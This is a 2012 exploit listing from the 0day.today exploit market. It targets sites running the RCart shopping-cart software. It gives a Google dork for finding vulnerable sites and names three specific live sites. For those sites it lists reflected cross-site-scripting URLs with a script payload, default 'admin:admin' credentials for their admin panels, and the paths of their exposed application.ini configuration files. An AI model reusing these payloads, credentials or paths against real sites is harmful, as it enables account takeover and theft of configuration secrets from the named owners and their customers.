[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

RCart Cross Site Scripting / Admin Panel

Author
ruben_linux
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19309
Category
web applications
Date add
02-09-2012
Platform
php
# Type: Xss & default admin panel
#
# Google Dork: "powered by rcart"
#
# Date: 1/9/12
#
# Author: ruben_linux
#
# Site : http://arealinux(dot)blogspot(dot)com(dot)es
#     http://www(dot)youtube(dot)com/user/rubenlinux
==================================

[+] http://www.emallhub.com/
[+] http://www.jaya4tech.com

http://www.jaya4tech.com/ajax/ajaxseachauto?format=json&q=[HEREXSS]&limit=10&timestamp=1346508322457
http://www.emallhub.com/ajax/ajaxseachauto?format=json&q=[HEREXSS]&limit=10&timestamp=1346508394788

<<script>alert(132);

http://www.jaya4tech.com/admin~~~|
                                 |---->admin:admin
http://www.emallhub.com/admin~~~~|

Also:
http://packetstormsecurity.org/files/115906/Zend-Framework-Information-Disclosure.html

[+] http://www.lumbiniimports.com/application/configs/application.ini
[+] http://www.emallhub.com/application/configs/application.ini
[+] http://www.jaya4tech.com/application/configs/application.ini



#  0day.today [2024-12-27]  #